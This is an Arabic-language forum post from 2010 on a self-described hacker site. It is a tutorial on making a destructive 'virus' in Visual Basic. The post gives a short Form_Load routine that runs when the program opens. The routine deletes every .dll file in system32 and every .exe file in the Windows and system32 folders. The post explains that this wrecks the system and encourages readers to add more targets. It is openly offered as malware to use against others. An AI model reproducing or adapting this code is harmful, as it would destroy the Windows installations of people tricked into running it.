www.blackhacker.tk

منتدى جامع لكل اللبنانيين وكل العالم.......
 
الرئيسيةالبوابةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 طؤيقة صنع فيروس باستخدام ال Visual Basic

اذهب الى الأسفل 
كاتب الموضوعرسالة
lebanon
Admin
avatar

عدد المساهمات : 122
تاريخ التسجيل : 01/12/2009
الموقع : www.blackhacker.tk

مُساهمةموضوع: طؤيقة صنع فيروس باستخدام ال Visual Basic   الثلاثاء يناير 05, 2010 8:16 pm

لصنع فيروس باستعمال الفيجوال باسيك

حتى تستطيع عمل فيروس مدمر للنظام عن طريق برنامج فيجوال بيسك يجب عليك ان تعرف بعض الاساسيات مثل:
1- أن تتعامل مع الأوامر و تستطيع تغيير الأسماء الأوامر و اختيار زمن عمل الأمر مثال:- rename command
2- أن تستطيع ربط الزر بالأمر أو أن تربط الزمن بالأمر مثال:- from load - command click

الكود مع الشرح
الكود سهل جدا و سوف نعمل فيروس يعمل تلقائيا عندما يفتح الباتش

مكونات الكود:-
1- الأمر kill و هو الأمر الذي يلغي ملف أو مجموعة ملفات تقوم أنت باختيارها
2- الممر path و هو الأمر الذي تحدد فيه مكان الملف أو مجموعة الملفات التي تريد الغاءها
فقط (كما قلت كود سهل جدا)
و سنقوم بوضع ملفات الويندوز كممر لأنها أكثر الملفات تدميرا للنظام و سأريكم مثال للكود
الكود:-
Private Sub Form_Load()
Kill "c:/windows/system32/*.dll"
Kill "c:/windows/*.exe"
Kill "c:/windows/system32/*.exe"
End Sub
الشرح:-
يبدأ عمل الفيروس حال فتح الباتش
محتاوه تدمير جميع الملفات بصيغة dll في ملف system32
تدمير جميع الملفات من نوع exe في ملف system32 و windows
يستهدف أهم ملفات في النظام أجمع تستطيع التغيير في الملفات المستهدفة و تستطيع زيادة الأوامر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://lebanon.discutfree.com
 
طؤيقة صنع فيروس باستخدام ال Visual Basic
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
www.blackhacker.tk :: قسم الهاكر :: فيروسات متنوعة-
انتقل الى: